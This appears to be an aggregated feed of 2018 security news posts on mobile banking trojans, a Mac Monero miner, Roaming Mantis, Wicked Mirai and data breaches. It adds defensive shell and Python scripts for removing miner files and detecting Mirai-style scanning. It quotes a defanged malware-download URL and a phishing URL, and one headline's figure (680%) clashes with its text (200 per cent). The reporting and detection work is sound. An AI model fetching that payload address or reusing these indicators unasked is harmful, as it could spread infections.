Europol Signs Cybersecurity Agreement With EU Agencies, WEF

Europol this week signed two memorandums of understanding related to cybersecurity cooperation – one with the World Economic Forum (WEF) and one with the European Union Agency for Network and Information Security (ENISA), the European Defence Agency (EDA), and the EU’s Computer Emergency Response Team (CERT-EU).


Fraud data shows 680% spike in fraudulent mobile app transactions

The number of fraudulent transactions originating from a mobile app during the first quarter has increased by 200 per cent since 2015, according to RSA Security. Analysis from the team also indicated that abuse of social media platforms is a growing problem, with social media replacing the dark web as the top hacker marketplace. Key stats ‘Appy hunting – The proportion of fraudulent transactions carried out on a mobile app has jumped from just 5 … More

The post Fraud data shows 680% spike in fraudulent mobile app transactions appeared first on Help Net Security.

1 in 10 healthcare organizations paid a ransom within the last year

More than one in three healthcare organizations have suffered a cyberattack within the last year, while almost one in 10 have paid a ransom or extortion fee, according to Imperva. Healthcare data is extremely valuable on the dark web as it contains highly sensitive data, both financial and protected health information. As a result, healthcare organizations are increasingly attractive to attackers. Additionally, with the introduction of web-based healthcare portals and remote patient mobile technology, managing … More

The post 1 in 10 healthcare organizations paid a ransom within the last year appeared first on Help Net Security.

Security Affairs: Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware

Moscow, May 24, 2018 – law enforcement, with support from Group-IB, has arrested a 32-year-old hacker, accused of stealing funds from Russian banks’ customers using Android mobile malware.

At the height of the group’s activity, victims reportedly lost between 1,500 and 8,000 dollars daily, and the gang used cryptocurrency for laundering.

Group-IB’s analysis reviewed the tools and techniques leveraged in the group’s attack, revealing that the gang tricked customers of Russian banks into downloading a malicious mobile application, “Banks at your fingertips”. The app claimed to be an aggregator of the country’s leading mobile banking systems and promised users ‘one-click’ access to all bank cards to view balances, transfer money from card to card, and pay for online services. The app was first discovered in 2016 and was distributed through spam emails.

The criminal group’s approach was rather elementary: customers of banks downloaded the fake mobile app and entered their card details. The Trojan then sent bank card data or online banking credentials to the C&C server. Following this, the threat actor transferred 200-500 dollars at a time to previously activated bank accounts, and bypassed SMS confirmation codes which were intercepted from the victim’s phone. The victims were not aware of the transactions as all SMS confirmations of transactions were blocked.

The investigation by authorities identified a member of the criminal group, the one responsible for transferring money from user accounts to the attackers’ cards: a 32-year-old unemployed Russian national with previous convictions connected to arms trafficking. During the suspect’s arrest in May 2018, authorities identified SIM cards and fraudulent bank cards to which stolen funds were transferred. The suspect has confessed to his actions, and the investigation and prosecution continue.

mobile malware

It seems we need to keep our mobiles safe. This is not the first case of theft; we have seen many cases in the past. One of them happened in March 2018, when a malware campaign that attempted to install a resource-draining currency miner on more than 400,000 computers in 12 hours was traced to a malicious backdoor sneaked into a BitTorrent application called Mediaget, a Microsoft researcher said. Researchers called it a supply-chain attack, which aims to infect large numbers of people by compromising a popular piece of hardware or software.

Many people have questions about torrenting; millions do not know whether torrenting is legal or illegal. Torrenting carries risks: authorities will catch and punish you if you torrent copyrighted material, and there is also a risk of downloading infected files. What you need is a good tool or piece of software that will keep you safe from these kinds of threats.

I reached out to Sergey Lupanin, Head of the cyber investigation department at Group-IB, for a comment:

“Actually this trojan is quite simple and private, meaning there are no descriptions or screenshots of it on dark-web forums. And its early versions didn’t interact with any mobile banking services. Users entered their card data and permitted this application to work with SMS messages.

The trojan used the HTTPS protocol with a self-signed certificate to work with C2 servers and sent the user’s card data to the actor. The actor entered this data (which included card number, CVV code, expiration date, and owner name) into a card2card service. The user received an SMS with the transaction authorization code, which was intercepted by this application and sent to the actor for transaction approval. And that’s it. Later this trojan received additional functionality: the ability to work with mobile banks via SMS, thus not requiring the threat actor to use any card2card service.”

About the author: Group-IB

Original post available here

Pierluigi Paganini

(Security Affairs – mobile malware, cybercrime)

The post Russian speaking hacker arrested for stealing $8,000 per day leveraging mobile malware appeared first on Security Affairs.




Security Affairs: Many users reported in the past few weeks their Macs have been infected with a new Monero Miner

In the past weeks, many Mac users have been infected with a new strain of Monero miner; the infections confirm the rise of this kind of malware.

According to researchers at Malwarebytes, many Mac users in the past weeks have been infected with a new strain of Monero miner. The owners of the infected Mac systems noticed that a process named “mshelper” had been consuming a lot of CPU power and draining their batteries.

“The malware became public knowledge in a post on Apple’s discussion forums, where the “mshelper” process was found to be the culprit. Digging deeper, it was discovered that there were a couple other suspicious processes installed as well. We went searching and found copies of these files.” reads the analysis published by Malwarebytes.

“The malware is mining for Monero cryptocurrency. Here’s a breakdown of its components.”

Monero Miner

The Mac malware is likely installed by fake Adobe Flash Player installers, by downloads from piracy websites, or by bait documents specially crafted to trick victims into opening them.

According to the experts, the launcher, the pplauncher file, is kept active by a launch daemon (com.pplauncher.plist), a circumstance that suggests the dropper had root privileges. The launcher was developed in Go and has a relatively large executable file (3.5 MB).

“Using Golang introduces significant overhead, resulting in a binary file containing more than 23,000 functions. Using this for what appears to be simple functionality is probably a sign that the person who created it is not particularly familiar with Macs.” continues the analysis published by Malwarebytes.

The launcher creates the miner process, mshelper, which is installed in the following location:

/tmp/mshelper/mshelper

The miner is an older version of the legitimate and open source mining tool named XMRig.

This malware is not particularly dangerous, but if the infected system already has a problem such as damaged fans or dust-clogged vents, it could cause overheating.

“Although the mshelper process is actually a legitimate piece of software being abused, it should still be removed along with the rest of the malware,” concludes Malwarebytes.

“This malware follows other cryptominers for macOS, such as Pwnet, CpuMeaner, and CreativeUpdate. I’d rather be infected with a cryptominer than some other kind of malware, but that doesn’t make it a good thing.”

Users can manually remove the malware by deleting these two files and rebooting their devices:

  • /Library/LaunchDaemons/com.pplauncher.plist
  • /Library/Application Support/pplauncher/pplauncher

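As an added example (not code from Malwarebytes or Security Affairs), a POSIX shell check-and-clean routine for the artifacts named above: it reports which of the three paths exist, optionally removes them in the order the article gives (daemon first, then files), and re-checks. The ROOT argument, the function names and the MSHELPER_REMOVE variable are assumptions of this example; only the paths come from the article.

```shell
#!/bin/sh
# Added example (not Malwarebytes' or Security Affairs' code): a defender's
# check-and-clean routine for the on-disk artifacts named in the article.
# ROOT (default "/") is prefixed to every path so the same functions can be
# pointed at a mounted volume or, in a test, at a constructed directory tree.

# Paths quoted in the article: launch daemon, Go launcher, and the XMRig copy.
MSHELPER_ARTIFACTS='Library/LaunchDaemons/com.pplauncher.plist
Library/Application Support/pplauncher/pplauncher
tmp/mshelper/mshelper'

# Print every artifact present under ROOT, one per line.
# Returns 0 when nothing was found and 1 when at least one artifact exists,
# so a monitoring job can do `check_mshelper_artifacts || alert`.
check_mshelper_artifacts() {
    root="${1:-/}"
    found=0
    old_ifs=$IFS
    IFS='
'   # one path per line; "Application Support" contains a space
    for rel in $MSHELPER_ARTIFACTS; do
        if [ -e "$root/$rel" ]; then
            printf 'FOUND: %s\n' "$root/$rel"
            found=1
        fi
    done
    IFS=$old_ifs
    return "$found"
}

# Number of artifacts present under ROOT, for scripting and tests.
count_mshelper_artifacts() {
    check_mshelper_artifacts "$1" | wc -l | tr -d ' '
}

# Live symptom from the article: an "mshelper" process burning CPU.
# Returns 0 if one is running, 1 if not, 2 if pgrep is unavailable.
mshelper_process_running() {
    command -v pgrep >/dev/null 2>&1 || return 2
    pgrep -x mshelper >/dev/null 2>&1
}

# Removal following the article's steps: unload the launch daemon first
# (launchctl exists only on macOS and needs root for a LaunchDaemon), then
# delete the files. The article's final step, a reboot, is left to the operator.
remove_mshelper_artifacts() {
    root="${1:-/}"
    plist="$root/Library/LaunchDaemons/com.pplauncher.plist"
    if [ -e "$plist" ] && command -v launchctl >/dev/null 2>&1; then
        launchctl unload "$plist" 2>/dev/null || true
    fi
    old_ifs=$IFS
    IFS='
'
    for rel in $MSHELPER_ARTIFACTS; do
        if [ -e "$root/$rel" ]; then
            rm -f -- "$root/$rel"
        fi
    done
    IFS=$old_ifs
    return 0
}

# When run directly: `sh mshelper_check.sh [ROOT]`; set MSHELPER_REMOVE=1 to
# also clean. The script name and the variable are assumptions of this example.
root="${1:-/}"
if check_mshelper_artifacts "$root"; then
    echo "no mshelper artifacts under $root"
elif [ "${MSHELPER_REMOVE:-0}" = 1 ]; then
    remove_mshelper_artifacts "$root"
    echo "artifacts removed; reboot the machine as the article advises"
else
    echo "artifacts present; rerun with MSHELPER_REMOVE=1 to delete them"
fi
```
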
Pierluigi Paganini

(Security Affairs – Monero Miner, hacking)

The post Many users reported in the past few weeks their Macs have been infected with a new Monero Miner appeared first on Security Affairs.




Happy anniversary to Dreamcast…and its scams

This month marks 20 years since the legendary SEGA Dreamcast console was first announced. Looked on fondly by gamers, it revolutionised many aspects of gaming and brought cheap(ish) online console gaming to the masses.


SEGA has endured many, many calls for it to come back as Dreamcast 2. The games are widely demanded as retro remakes, and it’s never quite faded from public view. What you might not know is that it’s been the subject of a number of phishing scams/fakeouts down the years. Here are some of my favourites.

Ye olden days

In 2006, when dinosaurs ruled the Earth and televisions were black and white, the Dreamcast had been dead and buried for a few years already. But people still used them, modded them, and still went online with them. See, it came with a modem, and the idea was you went online via SegaNet or DreamArena to play online or just browse the web. You can still go online with them today, with a little bit of additional work.

And now, enter stage left: Shenmue.


Anyone interested in games these days is likely already aware that Shenmue 1 and 2 are being remastered, and there’s even a Shenmue 3 on the way to help tie up the dangling story.

Back in the day, it seemed there was no chance of this ever happening despite endless requests, campaigns, fan networks, the lot. While pleas fell seemingly by the wayside, mischievous individuals were all too happy to fill the SEGA-shaped vacuum.

Here’s the interesting bit: Shenmue came with a disc called the Shenmue Passport, which was a crude way of popping a web browser via the game and looking at game-related content. It came to pass, one fateful day, while retro gamers were loading up their Passport disc that they saw the following:

Normally it’d say “click to enlarge” under that image, but the screenshot is so old this is the kind of maximum resolution size we have to cope with. (Dinosaurs and black and white televisions, remember?)

It says:

22/02/2006

The Shenmue Passport is in update process. Come again and visit us!

Downloads were suddenly available, with the promise of “more to come.” Everyone got excited, and some people even tried uploading their forklift truck racing times (long story).


Imagine their dismay when it turned out that someone had obtained the Shenmue(dot)com domain and decided to play a prank. For a while, the Shenmue domain came back with all the various downloadables that you could no longer obtain through the game, but the addition of the “more to come” messaging made people believe this was the first step of the game returning in new forms. All I can say to that is “Whoops.”

Some forum threads about this still remain online, and you can see some of the fallout including attempts by SEGA to reclaim the URL.


It reads:

Finally I want to say sorry again to all (like I said sorry in the Shenmue BBS), but now I promise to don’t do something stupid again. And sorry for my bad english (still learning) and my poor Japanese (still learning too). If anyone reach to a SEGA person, tell to him to contact me at [redacted] and I’ll transfer the domain as the people of this forum told me. Sorry again. But don’t loose the hope in Shenmue…

Oh dear.

2007: Shenmue 3 is coming (not)

Would you like a fake Shenmue 3 announcement? Of course you would. That video now has more than 1 million views (with some 800,000 of those landing at time of launch), and unfortunately, it’s yet another fakeout. Its creator simply took footage from the older games and mashed it up with promotional material from the abandoned Shenmue Online. Here’s the now obligatory thread of angry gamers.

2008: Sign-ups and affiliate codes

You know how someone grabbed the Shenmue domain? Well, lightning struck twice in 2008 when someone did much the same thing with the Dreamcast website. Here’s what it suddenly looked like:


“Do you still own a Dreamcast?”

Well, yes, several. Offering up the promise of a [yourname]ATdreamcast(dot)com email address, it sent the fans wild. Handing the new portal your console serial number(s), username, password, and a current email address would land you a seemingly valid yourserialnumber@user(dot)dreamcast(dot)com address. In practice, this meant the scammer ended up with a large list of emails to target with spam, and also—if people had reused passwords from their actual email for their “Dreamcast” mail—logins. My favourite thing about this was the video game website affiliate code ad hidden in the page:


2009: A grab bag of pranks

If you’re thinking this console has had a lot of scams hung around it, you’d be right. Step forward the 10th anniversary of said console, filled with yet more shenanigans. These are most of the major Dreamcast-themed antics down the years, but there are lots of others, like the photoshopped Shenmue 3 disc, or the edited “Shenmue 3: Believe” text from a magazine preview, which sent people into a frenzy.

Back to the future present

Now that Shenmue 3 is actually on the way, it’s likely that we’ll see some fresh new scams as the launch draws closer. You just can’t keep a good console—or a smart scam—down. Having said that, you don’t need to go digging around in the depths of retro gaming to find a scam. Your modern games and devices are often more than enough to keep scammers and other cybercriminals busy.

The post Happy anniversary to Dreamcast…and its scams appeared first on Malwarebytes Labs.

Is Cryptojacking Replacing Ransomware as the Next Big Threat?

Monitoring cyberthreats over time reveals interesting insights into the strategies used by cybercriminals and the evolution of the attack vectors they target. While the threat landscape continues to be quite diversified, trends do seem to run in predictable cycles. For example, over the last year or so ransomware has risen to become one of the most dominant threats plaguing organizations, especially in the healthcare, finance, and education sectors.


Pressures impacting security pros are up, threats are turning up the heat

Trustwave released the 2018 Security Pressures Report based on a global survey of 1,600 full-time IT professionals who are security decision makers or security influencers within their organization. Findings show that a majority of IT and cybersecurity professionals experienced increased pressures in 2017 when compared to the previous year, driven largely by a steep rise in sophisticated malware, continued deficit of high-level security talent and budget constraints. This report marks the fifth consecutive year pressures … More

The post Pressures impacting security pros are up, threats are turning up the heat appeared first on Help Net Security.

Crypto Me0wing attacks: Kitty cashes in on Monero

It’s been a month since the first Drupalgeddon 2.0 RCE (SA-CORE-2018-002/CVE-2018-7600) exploit was first published, unleashing its destruction into the wild… and through our cloud monitoring systems. As expected, since then we’ve been picking up various attack variants piggybacking on the Drupalgeddon 2.0 exploit, including remote scanners and backdoor attempts. In accordance with the latest dark web app hype, it wasn’t long until we started picking up cryptojacking exploit attempts directed at remote servers as … More

The post Crypto Me0wing attacks: Kitty cashes in on Monero appeared first on Help Net Security.

How an URL shortener allows malicious actors to hijack visitors’ CPU power

URL shorteners are often used by malware peddlers and attackers to trick users into following a link they otherwise wouldn’t. But Coinhive’s URL shortener carries an added danger: your CPU power can be surreptitiously hijacked to mine Monero. About the cnhv.co URL shortener “If you have an URL you’d like to forward your users to, you can create a cnhv.co shortlink to it. The user has to solve a number of hashes (adjustable by you) … More

The post How an URL shortener allows malicious actors to hijack visitors’ CPU power appeared first on Help Net Security.

The operations and economics of organized criminal email groups

Nine of the 10 captured organized criminal email groups operate out of Nigeria, they all leverage a multitude of attack methods, and business email compromise (BEC) is far more lucrative than any other attack, according to Agari. BEC is the most common attack type, indicative of a growing risk since the average age of the accounts was more than four years old, but BEC did not emerge until less than two years ago. “While much … More

The post The operations and economics of organized criminal email groups appeared first on Help Net Security.

Roaming Mantis gang evolves and broadens its operations

The Roaming Mantis malware, which initially targeted Android devices, has now broadened both its geographic range and its targets.

Security experts from Kaspersky Lab discovered that the operators behind the Roaming Mantis campaign continue to improve their malware, broadening their targets, their geographic range and their functional scope.

Roaming Mantis surfaced in March 2018, when hacked routers in Japan were redirecting users to compromised websites. Investigation by Kaspersky Lab indicates that the attack was targeting users in Asia with fake websites customized for English, Korean, Simplified Chinese and Japanese. Most impacted users were in Bangladesh, Japan, and South Korea.

“Our research revealed that the malware (sic) contains Android application IDs for popular mobile banking and game applications in South Korea. The malware is most prevalent in South Korea, and Korean is the first language targeted in HTML and test.dex. Based on our findings, it appears the malicious app was originally distributed to South Korean targets. Support was then added for Traditional Chinese, English, and Japanese, broadening its target base in the Asian region.”

The dreaded DNS hijacking malware was originally designed to steal users’ login credentials and two-factor authentication codes from Android devices; it has since evolved and was recently spotted targeting iOS devices as well as desktop users.

“In April 2018, Kaspersky Lab published a blog post titled ‘Roaming Mantis uses DNS hijacking to infect Android smartphones’. Roaming Mantis uses Android malware which is designed to spread via DNS hijacking and targets Android devices.” reads the analysis published by Kaspersky.

“In May, while monitoring Roaming Mantis, aka MoqHao and XLoader, we observed significant changes in their M.O. The group’s activity expanded geographically and they broadened their attack/evasion methods. Their landing pages and malicious apk files now support 27 languages covering Europe and the Middle East. In addition, the criminals added a phishing option for iOS devices, and crypto-mining capabilities for the PC.”

Operators behind the Roaming Mantis malware recently added the support for 27 languages to broaden their operations.

The new versions of the Roaming Mantis malware continue to spread via DNS hijacking: attackers use rogue websites to serve fake apps infected with banking malware to Android users, phishing sites to iOS users, and redirects to websites hosting a cryptocurrency-mining script.

To evade detection, malicious websites used in the campaign generate new packages in real time.

“Aside from the filename, we also observed that all the downloaded malicious apk files are unique due to package generation in real time as of May 16, 2018. It seems the actor added automatic generation of apk per download to avoid blacklisting by file hashes.” continues the analysis.

“This is a new feature. According to our monitoring, the apk samples downloaded on May 8, 2018 were all the same.”

According to Kaspersky, the recent malicious apk now implements 19 backdoor commands, including the new “ping” command as well as sendSms, setWifi, gcont, lock, onRecordAction, call and get_apps, among others.

Owners of iOS devices are redirected to a phishing site (http://security[.]apple[.]com/) that mimics the Apple website in an attempt to steal user credentials and financial data (user ID, password, card number, card expiration date and CVV number).


The Roaming Mantis operators have recently started targeting PC platforms as well: users are redirected to websites running the Coinhive web miner script.

The level of sophistication of the operations conducted by the Roaming Mantis gang and the rapid growth of the campaign lead the researchers to believe that the group has a strong financial motivation and is well-funded.

“The evasion techniques used by Roaming Mantis have also become more sophisticated. Several examples of recent additions described in this post include a new method of retrieving the C2 by using the email POP protocol, server side dynamic auto-generation of changing apk file/filenames, and the inclusion of an additional command to potentially assist in identifying research environments, have all been added.” concludes Kaspersky.
“The rapid growth of the campaign implies that those behind it have a strong financial motivation and are probably well-funded.”

Further details, including IoCs, are available in the report published by Kaspersky.

Pierluigi Paganini

(Security Affairs – Roaming Mantis, cybercrime)

The post Roaming Mantis gang evolves and broadens its operations appeared first on Security Affairs.

Fortnite is coming to Android, but malicious fake apps are already there

Android users eager to play the increasingly popular Fortnite survival game on their mobile devices are being targeted left and right with malicious apps masquerading as the game or apps related to it. What is Fortnite? Fortnite is a co-op sandbox survival game published by Epic Games. It was released for Microsoft Windows, macOS, PlayStation 4, and Xbox One in July 2017 and, more recently, for iOS. Its popularity is steadily rising and Epic has … More

The post Fortnite is coming to Android, but malicious fake apps are already there appeared first on Help Net Security.

Security Affairs newsletter Round 163 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Let me inform you that my new book, “Digging in the Deep Web”, is online

Kindle Edition

Paper Copy

Digging The Deep Web

Once again thank you!

·      A new flaw in Electron poses a risk to apps based on the framework
·      Malicious package containing Bytecoin cryptocurrency miner found on the Ubuntu Snap Store
·      UK mobile operator EE left a critical code system exposed with a default password
·      Chili’s restaurant chain is the latest victim of a Payment Card Breach
·      Critical Flaws in PGP and S/MIME Tools – Immediately disable tools that automatically decrypt PGP-encrypted email
·      Nigelthorn malware infected over 100,000 systems abusing Chrome extensions
·      PANDA Banker malware used in several campaigns aimed at banks, cryptocurrency exchanges and social media
·      Researchers disclosed details of EFAIL attacks on PGP and S/MIME tools. Experts believe claims are overblown
·      Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader
·      Dutch Government plans to phase out the use of Kaspersky solutions
·      Hackers shared technical details of a Code Injection flaw in Signal App
·      Massive DDoS attack hit the Danish state rail operator DSB
·      Rail Europe North America hit by payment card data breach
·      Anonymous defaced Russia govt website against Telegram ban
·      Mysterious hackers ingenuously reveal two Zero-Days to security community
·      Operation Hotel – Ecuador spent millions on spy operation for Julian Assange
·      Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!
·      Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks
·      Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code
·      Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files
·      A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms
·      CISCO issued security updates to address three critical flaws in Cisco DNA Center
·      Satori Botnet is targeting exposed Ethereum mining pools running the Claymore mining software
·      The new Wicked Mirai botnet leverages at least three new exploits
·      A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market
·      Chrome evolves security indicators by marking with a red warning for HTTP content
·      More than 800,000 DrayTek routers at risks due to a mysterious zero-day exploit
·      Updated – The new Wicked Mirai botnet leverages at least three new exploits

Pierluigi Paganini

(Security Affairs – Newsletter)

The post Security Affairs newsletter Round 163 – News of the week appeared first on Security Affairs.

Security Affairs: A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market

FireEye iSIGHT Intelligence discovered on the underground market a dataset allegedly containing 200 million unique sets of personally identifiable information stolen from several popular Japanese websites.

Security experts from FireEye iSIGHT Intelligence have discovered on underground forums a dataset allegedly containing 200 million unique sets of personally identifiable information (PII) stolen from several popular Japanese website databases.

It’s likely the data was taken via opportunistic compromise.

In fact, the dataset was discovered in an instant messenger group used for sharing and offering data.

The huge trove of data was first discovered in December 2017; the archive was offered by a Chinese user for around $150.

Stolen records included names, credentials, email addresses, dates of birth, phone numbers, and home addresses.

The huge archive is composed of data stolen from Japanese websites in a variety of industries, including retail, transportation, food and beverage, financial, and entertainment.

According to the experts, the data was harvested between May and June 2016; the threat actor has offered site databases for sale on Chinese underground forums since at least 2013.

“Yes, we’ve observed actors who were selling Japanese PII data or interested in purchase,” said Oleg Bondarenko, senior manager for international research at FireEye. “However [we] have never observed at such scale.”

Many users commented on the advertisement, demonstrating their interest in the data, but some of them provided negative feedback because they did not receive the purchased database.

“The data was extremely varied and not available through publicly available data sources; therefore, we believe that the advertised data is genuine,” states FireEye.

Experts believe the data is genuine; they noticed that most of the email addresses in a random sample of 200,000 belong to major third-party leaks.

“Since we did not observe most of the leaked data in any dataset as coming from one specific leak or on any publicly available website, this also indicates that the actor is unlikely to have bought or scraped the information from data leaks and resold it as a new product,” continues FireEye.


The analysis of another sample of 190,000 credentials revealed that 36% were duplicate values and that a huge number of the email addresses were fake.

The seller was offering data stolen from websites in China, Taiwan, Hong Kong, European countries, Australia, New Zealand, and North American countries.

“Since much of this information has been previously leaked in large-scale data leaks, as well as the possibility that it has been previously sold, we anticipate that this dataset will not enable new large scale malicious activity against targeted entities or individuals with leaked PII,” FireEye concluded.

According to officials, the scale of the data put up for sale is unprecedented for Japan.

FireEye is warning Japanese government offices and affected businesses. They say the information could be used to carry out cyberattacks on Japan.

Masatomi Iwama, an executive of FireEye’s Japan branch, explained that people must be careful about their security hygiene.

Pierluigi Paganini

(Security Affairs – Japanese websites, data leak)

The post A dataset of 200 million PII exfiltrated from several Japanese websites offered on underground market appeared first on Security Affairs.




A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms

A New Mexico man admitted being responsible for DDoS attacks against the websites of former employers, business competitors, and public services.

John Kelsey Gammell, 55, from New Mexico has been sentenced to 15 years in prison for launching distributed denial-of-service (DDoS) attacks on dozens of organizations and for firearms-related charges.

The man used popular “DDoS-for-hire” services, including VDoS, CStress, Inboot, Booter.xyz, and IPStresser, to power DDoS attacks against his victims.

The list of the victims is long and includes business competitors, former employers, law enforcement agencies, courts, banks, telecoms companies, and firms that refused to hire him.

The man used VPN services to hide his identity and cryptocurrency for his payments, but he was identified due to poor operational security. He sent emails to the victims while they were under DDoS attack, offering his services to mitigate the problem. The mails were sent from Gmail and Yahoo accounts he accessed from his home without masking his real IP address.


The man initially rejected a plea deal, but in January he pleaded guilty to intentionally causing damage to a protected computer, admitting to launching DDoS attacks on websites in the United States between July 2015 and March 2017. He also pleaded guilty to two counts of being a felon in possession of firearms and ammunition.

The man was sentenced to 180 months in jail and will have to compensate the victims of his DDoS attacks; the overall amount will be determined soon.

Pierluigi Paganini

(Security Affairs – distributed denial-of-service, cybercrime)

The post A New Mexico man sentenced to 15 Years in jail for DDoS Attacks and possession of firearms appeared first on Security Affairs.


This Week in Security News: Hackers and Cyber Attackers

Welcome to our weekly roundup, where we share what you need to know about the cybersecurity news and events that happened over the past few days. This week, Chili’s parent company – Brinker International – announced that consumer credit and debit card information had been compromised at some locations. In addition, Trend Micro helped the FBI take down the hackers behind the notorious malware-checking service Scan4You.

Read on to learn more.

The Rise and Fall of Scan4You

In May 2017, Scan4You, one of the biggest cybercrime facilitators, went offline after the FBI arrested and extradited two main suspects.

Blockchain: The Missing Link Between Security and the IoT?

The internet of things (IoT) has been associated with major cyberattacks, often involving the abuse of vulnerable connected devices, such as surveillance cameras, to facilitate malicious activities.

White House Eliminates Cybersecurity Coordinator Role

The White House eliminated the position of cybersecurity coordinator on the National Security Council, a post that helped develop policy to defend against increasingly sophisticated digital attacks.

Homeland Security Unveils New Cyber Security Strategy Amid Threats

The Department of Homeland Security unveiled a national strategy for addressing the growing number of cyber security risks amid concerns about the security of the U.S. midterm congressional elections.

Data Breach in San Francisco Exposes Personal Information of Nearly 900 Patients

Nearly 900 patients at two city-run hospitals in San Francisco are being notified that their personal information was exposed in a data breach late last year.

Chili’s Says Customers’ Payment Information Compromised in Data Breach

Chili’s parent company, Brinker International, announced that customer credit and debit card information had been compromised in some Chili’s restaurants.

Suspected Member of TheDarkOverlord Hacking Group Arrested in Serbia

Serbian police have arrested a 38-year-old man from Belgrade on suspicion of being part of infamous hacking group, The Dark Overlord (TDO).

What do you think of the White House’s decision to eliminate the cybersecurity coordinator position? Share your thoughts in the comments below or follow me on Twitter to continue the conversation: @JonLClay.

The post This Week in Security News: Hackers and Cyber Attackers appeared first on .

Security Affairs: The new Wicked Mirai botnet leverages at least three new exploits

Security experts from Fortinet have spotted a new variant of the Mirai botnet dubbed ‘Wicked Mirai’; it includes new exploits and spreads a new bot.

The name Wicked Mirai comes from strings in the code. The experts discovered that this new variant includes at least three new exploits compared to the original one.

“The FortiGuard Labs team has seen an increasing number of Mirai variants, thanks to the source code being made public two years ago.” reads the analysis published by Fortinet.

“Some made significant modifications, such as adding the capability to turn infected devices into swarms of malware proxies and cryptominers. Others integrated Mirai code with multiple exploits targeting both known and unknown vulnerabilities, similar to a new variant recently discovered by FortiGuard Labs, which we now call WICKED.”


The Mirai botnet was first spotted in 2016 by the experts at MalwareMustDie; at the time it was used to power massive DDoS attacks in the wild. Mirai’s source code was leaked online in October 2016, and since then many other variants have emerged in the wild, including Satori, Masuta, and Okiru.

According to Fortinet, the author of Wicked Mirai is the same person behind the other variants.

Mirai botnets are usually composed of three main modules: Attack, Killer, and Scanner. Fortinet focused its analysis on the Scanner module, which is responsible for the propagation of the malware.

The original Mirai relied on brute-force login attempts to compromise other IoT devices, while Wicked Mirai uses known exploits.

Wicked Mirai scans ports 8080, 8443, 80, and 81 by initiating a raw socket SYN connection to IoT devices. Once it has established a connection, the bot attempts to exploit the device and download its payload by writing the exploit strings to the socket through the write() syscall.

The experts discovered that the exploit used depends on the specific port the bot was able to connect to. Below is the list of devices targeted by Wicked Mirai:

The analysis of the code revealed the presence of the string SoraLOADER, which suggested it might attempt to distribute the Sora botnet. Further investigation contradicted this hypothesis: the bot actually connects to a malicious domain to download the Owari Mirai bot.

“After a successful exploit, this bot then downloads its payload from a malicious web site, in this case, hxxp://185[.]246[.]152[.]173/exploit/owari.{extension}. This makes it obvious that it aims to download the Owari bot, another Mirai variant, instead of the previously hinted at Sora bot.” reads the analysis.

“However, at the time of analysis, the Owari bot samples could no longer be found in the website directory. In another turn of events, it turns out that they have been replaced by the samples shown below, which were later found to be the Omni bot.”

The analysis of the website’s /bins directory revealed other Omni samples, which were apparently delivered using the GPON vulnerability CVE-2018-10561.
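As an added defender-side example (not code from the Security Affairs post or from Fortinet's analysis), the following Python scores hosts against the propagation pattern described above: SYN probes of ports 8080, 8443, 80 and 81 across many devices, followed by a fetch from an /exploit/ or /bins/ path on the drop site. The log formats, all addresses and the payload.example host name are constructed for this example.

```python
"""Flag hosts matching the Wicked Mirai propagation pattern (added example).

Two constructed inputs are used: flow records (source, destination, port,
TCP flags) and web-proxy records (source, method, URL).  Every address and
host name below is made up for the example.
"""
from collections import defaultdict
import re

# Ports the Wicked scanner probes, per Fortinet's analysis.
WICKED_PORTS = {80, 81, 8080, 8443}

# Drop-site layout seen in the analysis: /exploit/<bot>.<arch>, /bins/<bot>.<arch>
PAYLOAD_PATH = re.compile(r"^/(exploit|bins)/([A-Za-z0-9_]+)")

# Constructed flow records: "<src> <dst> <dport> <tcp_flags>"
FLOW_LOG = """\
10.0.0.5 10.0.1.10 8080 S
10.0.0.5 10.0.1.11 8443 S
10.0.0.5 10.0.1.12 81 S
10.0.0.5 10.0.1.13 80 S
10.0.0.5 10.0.1.14 8080 S
10.0.0.7 10.0.1.10 443 S
10.0.0.7 10.0.1.11 443 S
10.0.0.9 10.0.1.10 80 S
10.0.0.9 10.0.1.10 80 PA
"""

# Constructed web-proxy records: "<src> <method> <url>" (placeholder host)
PROXY_LOG = """\
10.0.0.5 GET http://payload.example/exploit/owari.mips
10.0.0.7 GET http://intranet.example/index.html
10.0.0.8 GET http://payload.example/bins/omni.arm7
"""


def scanning_hosts(flow_log, min_targets=4):
    """Return {src: sorted distinct destinations} for sources that sent a
    bare SYN to at least `min_targets` distinct hosts on the Wicked port set.
    A client talking to one web server on port 80 never reaches the
    threshold, which keeps ordinary browsing out of the result."""
    targets = defaultdict(set)
    for line in flow_log.splitlines():
        src, dst, dport, flags = line.split()
        if flags == "S" and int(dport) in WICKED_PORTS:
            targets[src].add(dst)
    return {s: sorted(d) for s, d in targets.items() if len(d) >= min_targets}


def payload_fetches(proxy_log):
    """Return [(src, bot_name)] for requests whose URL path follows the
    drop-site layout (/exploit/<bot>.<arch> or /bins/<bot>.<arch>)."""
    hits = []
    for line in proxy_log.splitlines():
        src, _method, url = line.split()
        path = re.sub(r"^https?://[^/]+", "", url)  # strip scheme and host
        match = PAYLOAD_PATH.match(path)
        if match:
            hits.append((src, match.group(2)))
    return hits


def triage(flow_log, proxy_log):
    """Combine both signals.  A host that scans the Wicked port set *and*
    fetched a bot binary is the strongest indicator of an infected device
    that is now propagating; either signal alone still deserves a look."""
    scanners = scanning_hosts(flow_log)
    fetched = dict(payload_fetches(proxy_log))
    verdict = {}
    for src in sorted(set(scanners) | set(fetched)):
        if src in scanners and src in fetched:
            verdict[src] = f"infected, spreading ({fetched[src]} downloaded)"
        elif src in scanners:
            verdict[src] = "scanning Wicked port set"
        else:
            verdict[src] = f"downloaded {fetched[src]} binary"
    return verdict


if __name__ == "__main__":
    for host, finding in triage(FLOW_LOG, PROXY_LOG).items():
        print(f"{host}: {finding}")
```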


